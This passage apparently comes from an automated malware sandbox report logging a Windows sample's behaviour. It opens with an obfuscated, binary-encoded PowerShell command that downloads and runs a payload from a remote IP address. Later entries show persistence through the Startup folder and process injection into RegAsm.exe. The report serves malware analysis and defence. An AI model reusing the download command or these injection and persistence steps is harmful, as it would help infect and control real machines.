0101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 3060	1	0
CreateProcessInternalW May 20, 2022, 10:07 a.m.	thread_identifier: 2148 thread_handle: 0x00000220 process_identifier: 788 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 788	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 3060	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 3060	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 3060	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000574 suspend_count: 1 process_identifier: 3060	1	0
CreateProcessInternalW May 20, 2022, 10:07 a.m.	thread_identifier: 2496 thread_handle: 0x00000464 process_identifier: 2492 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000047c	1	1
NtGetContextThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000464	1	0
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 2492 region_size: 503808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000047c	1	0
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ýð2w\$\$\$- $\$- ¯$?\$- ®$\$éØ$\$1$\$¢Ï_%\$¢ÏY%£\$¢ÏX%»\$éÏ$\$]$µ\$ÏU%Æ\$Ï£$\$Ï^%\$Rich\$PEL+[rbà0@@°8ð Kp8ð{8\|(\|@@°.text}.0 `.rdatap@r4@@.data¼?À¦@À.tls ´@À.gfids0¶@@.rsrcK Lº@@.reloc8p:@B base_address: 0x00400000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: base_address: 0x00401000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: base_address: 0x00454000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ lEpEjE..pÁFLÖFLÖFLÖFLÖFLÖFLÖFLÖFLÖFLÖFtÁFPÖFPÖFPÖFPÖFPÖFPÖFPÖFxÁFÿÿÿÿpEÂFÂFÂFÂFÂFxÁFðEpE¸EØÁFpÇFCPSTPDT ÂFàÂFÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZpÇFþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨3ðqF¨AüqFN!ArFmAtFE.?AVtype_info@@tFE.?AVbad_alloc@std@@tFE.?AVbad_array_new_length@std@@tFE.?AVlogic_error@std@@tFE.?AVlength_error@std@@tFE.?AVout_of_range@std@@tFE.?AV_Facet_base@std@@tFE.?AV_Locimp@locale@std@@tFE.?AVfacet@locale@std@@tFE.?AU_Crt_new_delete@std@@tFE.?AVcodecvt_base@std@@tFE.?AUctype_base@std@@tFE.?AV?$ctype@D@std@@tFE.?AV?$codecvt@DDU_Mbstatet@@@std@@tFE.?AVbad_exception@std@@tFE.HtFE.?AVfailure@ios_base@std@@tFE.?AVruntime_error@std@@tFE.?AVsystem_error@std@@tFE.?AVbad_cast@std@@tFE.?AV_System_error@std@@tFE.?AVexception@std@@ base_address: 0x0046c000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: base_address: 0x00470000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: %ü üg>g>çg> g>;°Í`w`JCCÞ¸~¸Çg>g>PM£L¡mÍVÇ1ÃÖ@ß@ßA¾Cf>£Á½Ô§×ôÝDàØÛMéÄT C% b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x00471000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: base_address: 0x00472000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: base_address: 0x00477000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2492 process_handle: 0x0000047c	1	1
NtSetContextThread May 20, 2022, 10:07 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4395778 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000464 process_identifier: 2492	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000464 suspend_count: 1 process_identifier: 2492	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 788	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 788	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 788	1	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 788	1	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (23 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\bb17803d-4384-4bab-809b-c199792eadf6\AgileDotNetRT.dll
file	C:\Users\test22\AppData\Local\Temp\97c2e543-1829-4fd6-91a1-35d2e827242f\AgileDotNetRT.dll
file	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

edi.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All